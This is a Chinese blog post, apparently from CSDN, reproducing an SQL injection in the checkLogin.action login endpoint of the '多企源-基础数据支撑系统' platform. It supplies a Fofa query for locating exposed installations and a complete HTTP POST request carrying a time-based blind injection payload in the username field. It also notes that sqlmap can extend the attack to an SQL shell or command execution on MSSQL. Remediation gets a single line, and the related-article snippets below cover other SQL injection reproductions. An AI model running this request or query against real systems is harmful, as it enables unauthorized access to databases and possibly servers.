多企源-基础数据支撑系统 checkLogin.action SQL注入

已于 2024-09-12 16:02:11 修改
阅读量66 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
于 2024-09-12 15:54:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142178043
版权

0x01 漏洞描述:

多企源-基础数据支撑系统由于对用户输入校验不严格,导致存在sql注入漏洞,从而使得系统处于不安全的状态。此外由于该系统大部分使用的数据库为MSSQL,可能将导致命令执行漏洞。

0x02 搜索语句:

Fofa:app="多企源-基础数据支撑系统"

0x03 漏洞复现:

POST /json/checkLogin.action?usercfg.username=1%27;WAITFOR%20DELAY%20%270:0:5%27--&usercfg.password=admin&validateCode=e1Lg&loginType=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: zh-CN
Connection: keep-alive

sqlmap验证

在高权限系统中存在sql shell可自行验证。 

0x04 修复建议:

关闭互联网暴露面或接口设置访问权限

iSee857
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
企源-基础数据支撑系统 checkLogin.action SQL注入漏洞复现
0xSec
08-30 134
企源-基础数据支撑系统 checkLogin.action 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
用友时空KSOA 多处 SQL注入漏洞复现
0xSec
07-31 565
用友时空KSOA系统 PrintZP.jsp、PrintZPFB.jsp、PrintZPYG.jsp、PrintZPZP.jsp、fillKP.jsp等多处接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
0731   用户登录、员工管理系统 CheckLogin.jsp
Fern2018的博客
07-31 1477
package com.wff.bean; public class Emp { //与数据表结构一致 private Integer empno; private String ename; private String sex; private Integer age; private Float sal; private Integer...
check login php,checkLogin.php
weixin_32861907的博客
04-01 445
require_once("connect_sql.php");if(!empty($_POST['name'])) {$username = $_POST['name'];} else {$username = "无用户名";}if(!empty($_POST['nickname'])) {$nickname = $_POST['nickname'];} else {$nickname = "无...
泛微E-Cology9 WorkPlanService 前台SQL注入漏洞复现(XVE-2024-18112)
0xSec
07-26 924
2024年7月,泛微官方发布了新补丁,修复了一处SQL注入漏洞。经分析,攻击者无需认证即可利用该漏洞,建议受影响的客户尽快修复漏洞。
网络信息安全实训【SQL注入
@MIKE小助手
06-17 776
🛢️SQL注入测试 ⭕实例代码,仅供测试⭕【1】搭建数据库基本环境 三、创建注册用户页面 【1】先进入网页的根目录 【2】创建网页文件 打开效果: 打开效果: 【1】插入数据数据库验证 【2】开始创建两个可用于实验的数据 【3】再次查看数据库【4】尝试正常登录检查 【5】使用正常的账号密码进行登录测试打开登录页面开始注入非法字符实现原理:直接恶意注释原代码里面的数据库查询语句中的查询密码这一项,导致密码验证直接失效实现无密码登录 这样就直接不需要密码就可以直接能够成功登录了。实现原理:直接.
SQL注入总结
qq_44657899的博客
07-25 3252
布尔盲注 布尔型数字盲注 fuzz1 1 结果1 2 结果2 2-1 结果1 fuzz2 1 结果1 1^1 结果2 1^0 结果1 常用语句^(ascii(substr((select(value)from(flag)),1,1))>1) 脚本一(简单,效率低): import requests s=requests.session() flag = '' for i in range(1,50): for j in '{qwertyuiopasdfghjklzxcvbnm_@#
php网站开发教程下载_《PHP网站开发实例教程》源代码 全面的PHP案例源代码 - 下载 - 搜珍网...
weixin_42319436的博客
03-08 1813
压缩包 : f9c8ec07518ba091bb2cd5997c2c.zip 列表chapter04/chapter04/example16/chapter04/example16/data.sqlchapter04/example16/register.htmlchapter04/example16/register.phpchapter04/example17/chapter04/exampl...
19-PHP代码审计——jizhicms逻辑漏洞分析(由越权引发的sql注入
网络安全
06-17 886
越权修改积分本质上是一个逻辑漏洞,但是在此基础上又触发了sql注入漏洞,原因在于代码逻辑不够严谨,考虑的不够全面,没有对修改的内容限制
Java-Web-开发技术试题.doc
09-30
包括加载驱动(Class.forName)、建立连接(DriverManager.getConnection)、创建 Statement(Connection.createStatement)或 PreparedStatement 对象,以及执行 SQL 语句和处理结果集(ResultSet)。理解这些概念...
E-Book软件单元测试记录.pdf
09-18
2. 单元测试的用例设计:文档中提到了多个测试用例,包括CheckLoginCheckRegister以及CheckPhone等。这些用例是针对特定功能设计的,用以验证不同功能点是否正确实现。 3. 测试类型:文档中提到了多种测试类型,...
在ASP.net中如何预防SQL注入式攻击.pdf
09-19
在***环境下,SQL注入式攻击是一种常见的安全威胁。SQL注入攻击主要通过在用户...通过对这些安全措施的综合应用,可以极大提升***应用程序的抗攻击能力,保护系统免遭SQL注入式攻击的侵害,确保系统安全稳定地运行。
浅谈网络安全的认识与学习规划
qq_201729558
09-05 1009
本文主要介绍网络安全认识与学习规划
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 631
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1752
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 826
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
稀土阻燃剂:电子设备的安全守护者
最新发布
Kingcela1的博客
09-11 440
稀土阻燃剂在电子设备中的应用主要是通过提升材料的阻燃性能、热稳定性和环保安全性,来满足现代电子产品对高性能和安全性的需求。随着技术的不断进步,稀土阻燃剂在电子设备领域的应用前景将会更加广阔。
深入解析反射型 XSS 与存储型 XSS:原理、危害与防范
2301_77160226的博客
09-05 801
反射型 XSS 和存储型 XSS 都是常见的 XSS 攻击类型,它们的原理和危害有所不同,但都可以对用户造成严重的危害。为了防范 XSS 攻击,我们需要采取一系列的措施,如输入验证和过滤、输出编码、使用安全的 API 和框架等。同时,我们也需要教育用户提高安全意识,不要点击来自不可信来源的链接,不要在不可信的网站上输入敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值